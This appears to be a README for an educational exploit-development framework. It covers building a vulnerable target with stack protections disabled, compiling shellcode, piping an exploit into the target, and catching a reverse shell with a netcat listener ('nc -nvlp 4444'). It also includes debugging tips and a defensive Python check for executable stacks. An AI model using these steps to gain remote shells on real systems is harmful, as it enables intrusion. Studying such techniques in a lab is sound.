Framework to recreate the process to make shellcode

Recreate the structure from The Anatomy of an Exploit

  1. Target: target.cpp
     clang++ -z execstack -fno-stack-protector -o target target.cpp
     ./target
  2. C code for shellcode: shellcode.c
     clang -Os -static -fno-stack-protector -o shellcode shellcode.c
     ./shellcode
  3. Inline asm shellcode: shellcode_asm.c
     clang -o shellcode_asm shellcode_asm.c
     ./shellcode_asm
  4. Shellcode in char buffer test: shellcode_test.c
     clang -z execstack -fno-stack-protector -o shellcode_test shellcode_test.c
     ./shellcode_test
  5. Exploit framework: exploit.c
     clang -o exploit exploit.c
     ./exploit
  6. Pipe exploit output in as target input
     ./exploit | ./launch
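Steps 1 and 4 only work because the binaries are linked with -z execstack, which marks the stack RWE in the ELF PT_GNU_STACK program header. The following check is an added example, not part of this framework: it reads that header the way the loader does and reports whether a built binary has an executable stack, so you can confirm the flag took effect on the test binaries (or audit that it is absent on anything else). It assumes little-endian ELF64 input; the sample images are constructed inline.

```python
import struct

PT_GNU_STACK = 0x6474E551  # p_type of the GNU stack-permission header
PF_X = 0x1                 # executable bit in p_flags


def stack_is_executable(elf: bytes) -> bool:
    """True if the loader would map this ELF64 image's stack executable.

    Loader rule: an executable stack results from a PT_GNU_STACK header
    whose p_flags has PF_X set, or from no PT_GNU_STACK header at all
    (the historical default that -z execstack / -z noexecstack override).
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 2:
        raise ValueError("not an ELF64 image")
    e_phoff = struct.unpack_from("<Q", elf, 0x20)[0]      # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    found = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            found = True
            if p_flags & PF_X:
                return True
    return not found


def check_file(path: str) -> bool:
    """Convenience wrapper: check an on-disk binary such as ./target."""
    with open(path, "rb") as f:
        return stack_is_executable(f.read())


def make_elf(stack_flags: int, with_stack_hdr: bool = True) -> bytes:
    """Constructed minimal ELF64 image: 64-byte header plus one program header."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8     # ELF64, LE, version 1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH",
                               2, 0x3E, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    p_type = PT_GNU_STACK if with_stack_hdr else 0          # 0 = PT_NULL
    phdr = struct.pack("<IIQQQQQQ", p_type, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


if __name__ == "__main__":
    print("RWE stack:", stack_is_executable(make_elf(0x7)))   # -z execstack
    print("RW stack :", stack_is_executable(make_elf(0x6)))   # -z noexecstack
```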

Reverse shell C code

In one terminal:

nc -nvlp 4444

In another:

clang -o reverse_shellcode reverse_shellcode.c
./reverse_shellcode

Tips:

  • strace
    ./exploit > file
    strace -o strace.log ./launch < file
    cat strace.log
  • gdb
    ./exploit > file
    gdb -q ./launch
    (gdb) r < file
  • objdump
    objdump -d shellcode | grep -A 14 "<main>"